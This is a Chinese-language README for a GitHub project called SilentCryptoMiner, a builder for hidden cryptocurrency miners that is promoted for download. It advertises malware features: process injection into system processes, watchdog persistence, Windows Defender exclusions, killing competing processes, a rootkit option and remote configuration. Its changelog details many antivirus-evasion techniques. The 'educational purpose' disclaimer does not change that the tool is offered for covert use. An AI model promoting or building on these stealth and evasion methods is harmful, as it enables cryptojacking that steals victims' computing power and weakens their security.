Unam-Sanctam/SilentCryptoMiner

 # SilentCryptoMiner v3.4.0 - 用于 ETC, RVN, XMR, RTM 等的矿机 一款免费的静默（隐藏）原生加密货币矿机，能够挖掘 ETC、RVN、XMR、RTM 等多种货币，并具备许多适合静默挖矿的特性。 该矿机可以挖掘以下所有算法，因此也能挖掘使用其中任何一种算法的加密货币：

算法列表：

| 算法 | 加密货币示例 | |-------------|----------------------------------------| |rx/0 |Monero, Zephyr | |gr |Raptoreum| ethash |Callisto, Dubaicoin, Ellaism, Etho, EthereumPoW, Expanse, Nilu, Pirl, PowBlocks| etchash | Ethereum Classic| ubqhash | Ubiq | kawpow |Ravencoin, Neoxa, Meowcoin, Neurai, Paprikacoin, Clore | firopow |Firo, Kiirocoin | progpow | Sero | progpowz | Zano | evrprogpow | Evrmore | argon2/chukwa | 2ACoin | rx/arq | ArQmA | cn-heavy/xhv | Haven, Blockcloud | cn/fast | Electronero, ElectroneroXP | rx/keva | Kevacoin cn-pico | Kryptokrona | cn/half | Masari | argon2/ninja | NinjaCoin | rx/sfx | Safex | cn/r | Sumokoin | cn-pico/tlo |Talleo | argon2/chukwav2 | Turtlecoin | cn/upx2 | Uplexa | rx/wow | Wownero | cn/ccx | cn/zls | cn/double | cn/2 | cn/xao | cn/rwz | cn/rto | cn-heavy/tube | cn-heavy/0 | cn/1 | cn-lite/1 | cn-lite/0 | cn/0 |

# 主要特性 - 原生 C++ - 矿机安装器/注入器和 watchdog 均完全使用 C++ 编写，除了需要 64 位操作系统外无其他运行要求 - 注入（静默/隐藏） - 可将矿机隐藏在其他进程内部，例如 conhost.exe、explorer.exe、svchost.exe 等 - 空闲挖矿 - 可配置在计算机正在使用或未使用时，以不同的 CPU 和 GPU 使用率进行挖矿，或者完全不挖 - 隐身 - 当“Stealth Targets（隐身目标）”选项中的任何程序打开时，暂停矿机并清除 GPU 内存和 RAM - Watchdog（看门狗） - 监控矿机文件、矿机进程和启动项，并在任何内容被移除或终止时恢复矿机 - 多重挖矿 - 可以创建多个矿机同时运行，例如一个 XMR（CPU）矿机和一个 RVN（GPU）矿机 - CPU 和 GPU 挖矿 - 可在 CPU 和 GPU（Nvidia 和 AMD）上同时进行挖矿 - Windows Defender 排除项 - 启动后可将排除项添加到 Windows Defender 中以避免被检测 - 进程杀手 - 持续检查“Kill Targets（终止目标）”列表中的任何程序，并在发现时将其终止 - 远程配置 - 可每 100 分钟从指定 URL 远程获取矿机设置 - Web Panel 支持 - 支持在免费的自托管在线 Web Panel 中高效地监控和配置所有矿机 - 以及更多功能。 - 下载 预编译版：https://github.com/Unam-Sanctam/SilentCryptoMiner/releases/ 示例设置：示例设置 # Wiki 您可以在页面顶部或此处找到 Wiki。该 Wiki 包含有关矿机及其所有功能的信息，以及一些常见问题的解答。 # Web Panel 您可以在此处找到该矿机官方支持的 Web Panel：UnamWebPanel。Web Panel 可用于监控矿机的哈希率、状态、连接设置等。它还可以用于更改矿机设置，就像“远程配置”选项所做的那样。 # 更新日志 ### 3.4.0 (14-11-2023) - 更改了管理员“Startup”安装过程，从使用 Task Scheduler 改为安装为 Service - 将管理员“Startup”安装从安装到“Program Files”改为安装到“ProgramData” - 移除了“Run as System”选项，因为 Services 始终以 System 身份运行 - 在“Add Defender Exclusions”功能中添加了 MSRT 移除功能 - 将 C++ 编译器更改为检测更少且功能更好的编译器 - 改进了外部编译器启动过程，以在构建路径包含空格或 unicode 字符时绕过编译器错误 - 修改了编译过程，引入了“strip”以移除所有不必要的符号和重定位数据 - 调整了编译器优化级别，以减轻某些防病毒检测 - 在编译期间启用了 LTO，以消除许多由未使用部分中编译器引起的检测 - 将编译器从使用临时文件改为使用管道，以便在某些不规则环境中更好地工作 - 更改了编译过程，为构建的矿机文件添加了随机创建日期和最后写入日期 - 将矿机构建器的 .NET Framework 版本从 .NET 4.8 恢复到 .NET 4.5，以获得更好的兼容性 - 更改了矿机注入技术，以降低复杂性和防病毒检测 - 优化了进程创建代码 - 重制了矿机注入循环代码和 watchdog mutex 检查循环代码，以绕过新的针对性 Windows Defender 检测 - 极大改进了 SysWhispersU syscall 生成器 - 从静态 syscall 切换到随机动态 syscall - 将“Run as Administrator”功能改为通过编程方式提权，而不是通过 manifest 文件，以避免 manifest 引起的检测 - 对所有常量和字面量添加了混淆 - 对嵌入文件添加了 base64 编码，以绕过由高熵数据引起的检测 - 将嵌入资源的格式从十六进制更改为十进制，以减少编译期间的内存使用和时间 - 更改了默认的“Startup”选项卡的“Entry Name”和“File Name”为随机字符串，因为 Windows Defender 会将当前的默认名称作为目标 - 在“Startup”选项卡的“Entry Name”和“File Name”选项旁边添加了新的“Randomize”按钮，以允许快速随机化 - 添加了新的“Advanced Option”，允许对嵌入的矿机资源文件自动进行 UPX 压缩 - 将“Disable Windows Update”和“Disable Sleep”功能改为直接调用程序，而不是通过命令行调用它们 - 将默认的“Inject Into”程序从 explorer.exe 更改为 conhost.exe，因为 explorer.exe 现在在以 System 身份运行时会触发检测 - 在“Add Defender Exclusions”功能中添加了“.exe”扩展名排除项，以潜在地防止某些未来的常规内存检测 - 移除了 XMR“GPU Mining”选项，因为 CUDA 存在问题，而且它比现有的专用 GPU 矿机性能更差 - 移除了 XMR“CPU Mining”选项，因为既然“GPU Mining”选项已不存在，它也没有理由继续存在 - 重写了 XOR 密码功能，以绕过 XOR 混淆检测 - 重制了“Block Websites”功能代码，以绕过某些由循环引起的检测 - 极大改进了整体代码，减少了浪费的调用、句柄和可能的代码签名 - 将“Start Delay”更改为仅在安装前应用，以避免超时 - 更新了卸载程序以正确移除所有文件 - 更新了矿机 ### 3.3.1 (04/09/2023) - 将 OpenCL ICD loader 静态添加到 GPU 矿机中，因为某些系统的本地 loader 似乎不起作用 - 添加了在检测到长时间零哈希率时自动重启 CPU 挖矿核心的功能 - 修复了在禁用“Run as System”时管理员“Startup”触发器变为“on login”的问题 - 通过修改矿机编译命令减少了部分防病毒检测 - 将部分矿机构建器的编译器命令更改为绝对路径而不是相对路径 - 添加了“Assembly”选项卡“Version”号清理功能 - 修复了编译期间不必要的日志警告 - 移除了矿机中许多旧的未使用的调试字符串 ### 3.3.0 (24/08/2023) - 将 KawPow (kawpow) 算法直接添加到 GPU 矿机中 - 添加了新的 FiroPow (firopow) 算法 - 添加了新的 ProgPow (progpow) 算法 - 添加了新的 ProgPowZ (progpowz) 算法 - 添加了新的 EvrProgPow (evrprogpow) 算法 - 仅使用 OpenCL 针对 Nvidia 和 AMD 实现了 KawPow、FiroPow、EvrProgPow、ProgPow 和 ProgPowZ，以绕过对庞大 CUDA NVRTC 库的需求 - 重写了大部分 GPU 矿机，以增加对多个算法系列的支持，并极大地提高了稳定性和可靠性 - 添加了 Sero-Proxy 协议，以便能够挖掘 Sero (ProgPow) - 从 XMR 矿机中移除了 KawPow (kawpow) 算法以及庞大的 CUDA NVRTC 库，以确保没有人会意外使用它 - 重新添加了 Panthera (rx/xla) 算法 - 添加了 Zephyr coin (rx/0) solo 挖矿支持 - 将 XMR 矿机的“GPU Mining”选项移至“Advanced”选项卡中，以阻止无利可图的 XMR GPU 挖矿 - 将“Use Rootkit”选项移至“Advanced Options”中，以便更好地明确其复杂性 - 将 Task Scheduler Task 的创建从 Powershell 更改为仅使用带有临时 XML 文件的命令行 - 将 MSR 驱动程序路径从使用静态库路径更改为动态生成的路径 - 修改了嵌入文件的加密和解密，以减少启发式检测 - 将代码编译器构建更改为另一种不同的构建，以极大地减少由编译器引起的防病毒检测 - 通过更好地在命令中强制使用绝对路径，改进了外部编译器执行命令 - 在矿机安装器/注入器中添加了一个 mutex，使其可被 watchdog 检查 - 缩短了 watchdog 的检查间隔，以提高持久性 - 移除了未使用的辅助函数 - 重写了卸载程序的矿机终止功能，以处理超过 ushort 限制的 Process ID - 将 unicode 字符串初始化从宏更改为函数，以减少最终代码大小 - 将字符串格式化从使用内置 Windows API 更改为使用小得多的自定义函数 - 将 Web Panel 报告移至 CPU 空闲使用率更改之前发生，以帮助使哈希率看起来不那么令人困惑 - 改进了在具有不频繁新作业的矿池上离开“Stealth”时的 RandomX 数据库重新生成速度 - 修复了在禁用“Run as System”时奇怪的默认“Stealth on Fullscreen”配置值问题 - 修复了 GPU 检查函数内部可能的空终止符字符串长度计算问题 - 减少了不必要的递归目录创建函数堆栈大小 - 更改了矿机执行状态，不再在某些计算机上始终半阻塞睡眠模式 - 重组了算法选择列表，使其更易于使用 - 添加了半 CLI 功能，用于通过命令行构建矿机 - 将 rootkit 更新到新版本 您可以在此处查看完整的更新日志 # 作者 - **Unam Sanctam** # 免责声明 我，即创作者，不对由本软件造成的任何行为和/或损害承担责任。 您应对自己的行为承担全部责任，并承认本软件仅出于教育目的而创建。 本软件的主要目的不是被恶意使用，也不是用于任何您不拥有或没有使用权系统之上。 使用本软件即表示您自动同意上述声明。 # 许可证 本项目基于 MIT 许可证授权 - 详见 LICENSE 文件

标签：C++, CPU挖矿, ETC, GPU挖矿, RTM, RVN, SilentCryptoMiner, SSH蜜罐, Veh, XMR, 加密货币挖矿, 嗅探欺骗, 恶意软件, 挖矿僵尸网络, 挖矿生成器, 挖矿软件, 数据擦除, 无文件挖矿, 无线安全, 木马, 权限维持, 网络安全, 进程注入, 门罗币挖矿, 隐私保护, 隐蔽执行, 隐藏挖矿, 黑产